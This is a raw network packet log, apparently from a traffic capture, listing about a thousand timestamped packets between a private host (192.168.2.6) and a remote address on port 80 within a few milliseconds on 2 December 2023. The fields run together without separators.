                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980133057 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980143070 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980155945 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980160952 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980168104 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980179071 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980187893 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980205059 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980210066 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980221033 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980253935 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980276108 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980288029 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980319023 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980320930 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980331898 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980359077 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980443954 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980456114 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980483055 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980485916 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980528116 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980556965 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980571985 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980582952 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980612040 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980642080 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980654001 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980664015 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980678082 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980684996 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980710983 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980712891 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980725050 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980736017 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980746984 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980751038 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980777025 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980777025 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980819941 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980834007 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980845928 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980881929 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980925083 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980936050 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980947018 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980977058 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980998039 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981010914 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981036901 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981066942 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981080055 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981106997 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981116056 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981152058 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981156111 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981163979 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981184959 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981198072 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981259108 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981270075 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981281042 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981292009 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981297970 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981327057 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981329918 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981359959 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981369972 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981370926 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981383085 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981404066 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981409073 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981424093 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981451988 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981451035 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981476068 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981491089 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981587887 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981597900 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981609106 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981618881 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981640100 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981662989 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981739998 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981754065 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981781960 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981785059 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981796026 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981806040 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981817007 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981828928 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981834888 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981882095 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981894016 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981904030 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981914997 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981916904 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981935978 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981947899 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981972933 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.981996059 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982050896 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982062101 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982090950 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982112885 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982130051 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982141018 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982156038 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982186079 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982187986 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982198954 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982213020 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982239008 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982281923 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982307911 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982321024 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982331991 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982340097 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982358932 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982410908 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982422113 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982435942 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982446909 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982451916 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982459068 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982470036 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982479095 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982506037 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982618093 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982637882 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982650995 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982661009 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982662916 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982673883 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982686996 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982697010 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982722044 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982772112 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982784033 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982795000 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982812881 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982820034 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982837915 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982841015 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982852936 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982882977 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982891083 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982904911 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982930899 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982954025 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982965946 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982978106 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.982999086 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983005047 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983027935 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983027935 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983051062 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983088017 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983093977 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983108044 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983110905 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983119965 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983141899 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983144045 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983181953 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983232021 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983244896 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983258009 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983268976 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983290911 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983303070 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983328104 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983341932 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983351946 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983365059 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983391047 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983412027 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983483076 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983494997 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983508110 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983536005 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983539104 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983555079 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983577013 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983582020 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983589888 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983614922 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983674049 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983685970 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983697891 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983705044 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983716011 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983721972 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983748913 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983818054 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983850002 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983871937 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983885050 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983891010 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983897924 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983923912 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983944893 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983958006 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.983983994 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984052896 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984071970 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984083891 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984096050 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984096050 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984118938 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984133959 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984147072 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984158039 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984170914 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984172106 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984196901 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984247923 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984261036 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984272957 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984287977 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984313011 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984317064 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984330893 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984344006 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984354973 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984369993 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984380960 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984406948 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984491110 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984505892 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984517097 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984529018 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984529972 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984554052 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984563112 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984572887 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984596014 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984605074 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984638929 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984638929 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984654903 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984690905 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984693050 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984708071 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984731913 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984750032 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984761953 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984786987 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984800100 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984803915 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984812975 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984843016 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984922886 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984937906 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984982014 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.984993935 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.985003948 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.985007048 CET804972091.215.85.17192.168.2.6
